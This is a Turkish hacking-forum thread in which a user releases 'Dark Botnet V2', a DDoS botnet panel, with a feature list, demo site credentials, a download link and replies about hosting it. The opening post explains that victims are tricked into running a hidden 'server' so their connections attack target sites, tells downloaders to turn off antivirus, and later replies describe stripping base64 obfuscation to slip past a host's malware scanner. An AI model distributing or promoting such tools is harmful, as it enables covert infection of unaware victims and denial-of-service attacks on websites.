Dark Botnet V2 Çıktı !!

'Heisenberg

Uzman üye
17 Eki 2014
1,723
19
Antalya
Merhaba Arkadaşlar,
Hatırlıyorsanız geçenlerde (2-3 ay önce) Dark Botnet v1'i yayınlamıştım. Sonra birsürü hata çıktı, sunucum üzerinden Türk sitelerine saldırıldı ben de mecburen silmek zorunda kaldım onu. Biraz geçte olsa sonunda 2. versiyonu çıkardım yayınlıyorum :)

Öncelikle gecikme için herkesten çok özür diliyorum, bir süre sanala giremedim, ama artık buralardayım, dönüşümün şerefine yayınlayayım dedim şu v2'yi :) Neyse çok uzatmadan konuya giriyorum hemen.

5k6WPD.png

V2 Özellikleri

1-) Artık Türk Sitelerine Saldırı Yapılamıyor. Yapılan Saldırılar Otomatikmen Engelleniyor.
2-) Eksik olan install.php Dosyası Yüklendi.
3-) Saldırıların Hasar Oranı %10 - %20 Civarında Yükseltildi.
4-) Tasarım Değişti.
5-) Lisans Kaldırıldı.

Site Ön İzlemesi:

0kJOvR.png

Demo Bilgileri:

Site Adresi: dark-botnet.tk
User Code: SehitlerOlmez
User Pass: VatanBolunmez

Çalışma Mantığı:
Bir Kurban Seçiyorsunuz, Sonra Ona Çeşitli Yollarla Server'ı Yediriyorsunuz ve Daha Sonra Kurban Bilgisayarda Hiçbirşeyin Farkında Olmadan Takılırken Arkaplanda Server'ımız Sizin Belirlediğiniz Siteye Saldırmak Üzere Kurbanımızın İnternetini Kullanıyor.

KURULUM

95ZkMo.png

qlO76B.png

MyAqNk.png

QlObDv.png

SERVER 'ı Oluşturma

XoROV0.png

b27NqG.png

d2gYQ7.png

------------------------------------------------------------------------

İndirme Linki: Dosya.tc - cretsiz, Hzl ve Kolay Dosya Paylam

VirüsTotal Taraması: https://www.virustotal.com/tr/file/...26a94b0387235b045df11a2b/analysis/1441995717/

VirüsTotal'de Niye Virüs Çıktı Diye Soracak Olursanız, V1'deki Açıklamamı Aynen Aktarıyorum:

Beyler Sonuçta İçinde Server Bulunduran Bişey Olduğu İçin Virüs Total Virüs Buldu. Ama Trojan Mantığıyla Çalışan Herşeyde Virüs Çıkar Örn: (Darcomet Rat Her Nekadar Kaliteli ve Kullanışlı Bir RAT Olsada Anti Taramalarında Virüslü Çıkar.) Sonuçta Yaptığımız İllegal Bişey. Ben Yinede VirüsTotal Koyuyorum İnanmayan İndirmeyebilir. Ama İndirecekseniz, Antilerinizi Kapatın Yoksa İndirdiğiniz Anda Siler :)

Arkadaşlar Siz Sormadan Ben Söyleyeyim Fırsat Bulur Bulmaz Ekliyeceğim Kullanım Video'sunu da.

//EDİT

Kod:
[COLOR="Cyan"][CENTER]Forbidden: a malicious file has been detected.
Detected as: php.h.eval.gzinflate.base64_injection-1[/CENTER][/COLOR]

Sorunu Çözülmüştür.

//İndirme Linki ve Dosyalar Güncellenmiştir.

Son düzenleme:

'Heisenberg

Uzman üye
17 Eki 2014
1,723
19
Antalya
000webhost ve hostinger olmak üzere 10+ sitede denedim hepsinde bozkurt botnet adına banlıyor :(

beni de banlıyor kardeşim, muhtemelen demo da banlanacak yakında. bunu kendi sunucunuzda veya paralı aldığınız hostinglerde kullanmalısınız zaten. ben kendi hosting'ime atıp onu konudaki demoyla değiştireceğim yarın. Onu kullanabilirsiniz.

Slaughter 9

ANKA ONURSAL ÜYE
1 Şub 2015
3,415
12
Turkey
Kardeşim eline sağlık, güzel olmuş fakat konu yeri yanlış. Yetkililere başvurarak konunun taşınmasını iste.

gkbrkttr

Üye
25 Haz 2015
224
0
Merhaba Arkadaşlar,
Hatırlıyorsanız geçenlerde (2-3 ay önce) Dark Botnet v1'i yayınlamıştım. Sonra birsürü hata çıktı, sunucum üzerinden Türk sitelerine saldırıldı ben de mecburen silmek zorunda kaldım onu. Biraz geçte olsa sonunda 2. versiyonu çıkardım yayınlıyorum :)

Öncelikle gecikme için herkesten çok özür diliyorum, bir süre sanala giremedim, ama artık buralardayım, dönüşümün şerefine yayınlayayım dedim şu v2'yi :) Neyse çok uzatmadan konuya giriyorum hemen.

5k6WPD.png

V2 Özellikleri

1-) Artık Türk Sitelerine Saldırı Yapılamıyor. Yapılan Saldırılar Otomatikmen Engelleniyor.
2-) Eksik olan install.php Dosyası Yüklendi.
3-) Saldırıların Hasar Oranı %10 - %20 Civarında Yükseltildi.
4-) Tasarım Değişti.
5-) Lisans Kaldırıldı.

Site Ön İzlemesi:

0kJOvR.png

Demo Bilgileri:

Site Adresi: dark-botnet.tk
User Code: SehitlerOlmez
User Pass: VatanBolunmez

Çalışma Mantığı:
Bir Kurban Seçiyorsunuz, Sonra Ona Çeşitli Yollarla Server'ı Yediriyorsunuz ve Daha Sonra Kurban Bilgisayarda Hiçbirşeyin Farkında Olmadan Takılırken Arkaplanda Server'ımız Sizin Belirlediğiniz Siteye Saldırmak Üzere Kurbanımızın İnternetini Kullanıyor.

KURULUM

95ZkMo.png

qlO76B.png

MyAqNk.png

QlObDv.png

SERVER 'ı Oluşturma

XoROV0.png

b27NqG.png

d2gYQ7.png

------------------------------------------------------------------------

İndirme Linki: Dosya.tc - cretsiz, Hzl ve Kolay Dosya Paylam

VirüsTotal Taraması: https://www.virustotal.com/tr/file/...26a94b0387235b045df11a2b/analysis/1441995717/

VirüsTotal'de Niye Virüs Çıktı Diye Soracak Olursanız, V1'deki Açıklamamı Aynen Aktarıyorum:

Arkadaşlar Siz Sormadan Ben Söyleyeyim Fırsat Bulur Bulmaz Ekliyeceğim Kullanım Video'sunu da.

hocam siteye giriş yaptıktan sonra gelen ekranda şu yazıyor

Forbidden: a malicious file has been detected.

Detected as: php.h.eval.gzinflate.base64_injection-1

'Heisenberg

Uzman üye
17 Eki 2014
1,723
19
Antalya
Kardeşim eline sağlık, güzel olmuş fakat konu yeri yanlış. Yetkililere başvurarak konunun taşınmasını iste.

en uygun burası geldi gözüme nereye açsam bilemedim :D

hocam siteye giriş yaptıktan sonra gelen ekranda şu yazıyor

Forbidden: a malicious file has been detected.

Detected as: php.h.eval.gzinflate.base64_injection-1

Sorun şifrelemeden kaynaklı olmuş, tabletten giriyorum şu an yarın yenilerim indirme linkini.

Kenawors

Katılımcı Üye
24 Haz 2015
569
0
Eline sağlık kardeşim :)

Darkddoser gibi üstün programlarla böyle seviyesiz programları karşılaştırmayın kardeşim mazallah hilkatın garbesi gibi konuşuyorsun :inv
Bu laf aynı İphone 6 gibi o kadar üstün bir telefon ile kötü Türk telefonunu karşılaştırmayın gibi oldu Öyle konuşarak arkadaşın başarma azmini kırıyorsun

'Heisenberg

Uzman üye
17 Eki 2014
1,723
19
Antalya

Bu laf aynı İphone 6 gibi o kadar üstün bir telefon ile kötü Türk telefonunu karşılaştırmayın gibi oldu Öyle konuşarak arkadaşın başarma azmini kırıyorsun

Sağol abi, yorumun için teşekkür ederim ama durumun böyle olduğunun ben de farkındayım :D ama kodlaması bana ait değil zaten, o yüzden takmıyorum fazla. ben hali hazırdaki sistemin üstüne bişeyler ekledim ve türkçeleştirdim sadece :)

TheGeccsaa

Uzman üye
3 Nis 2013
1,332
0

haksızda sayılmaz ama bari çalıcan bir şey koysun şurayada millet uğraşmasan biz millete sağlam program ismi verdik uğraşmasınlar diye :)

BlackHatHacker

Uzman üye
21 Nis 2014
1,703
0
Secret
Darkddoser gibi üstün programlarla böyle seviyesiz programları karşılaştırmayın kardeşim mazallah hilkatın garbesi gibi konuşuyorsun :inv

HTML biliyormusun?
CSS biliyor musun?
PHP biliyor musun?
Daha da önemlisi bir site yapmanın ne kadar zor olduğunu biliyor musun?
Bu adam tek tek kodlayarak yapmış , bir emek var buna sen "seviyesiz" diyemezsin , öyle bir hakkın yok.​

'Heisenberg

Uzman üye
17 Eki 2014
1,723
19
Antalya
//Upp

aşırı yoğun istek üzere, gece gece yatağımdan kalktım ve güncelledim linki. base64 şifrelendirilmesi kalktı sorun çözülecektir umarım.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.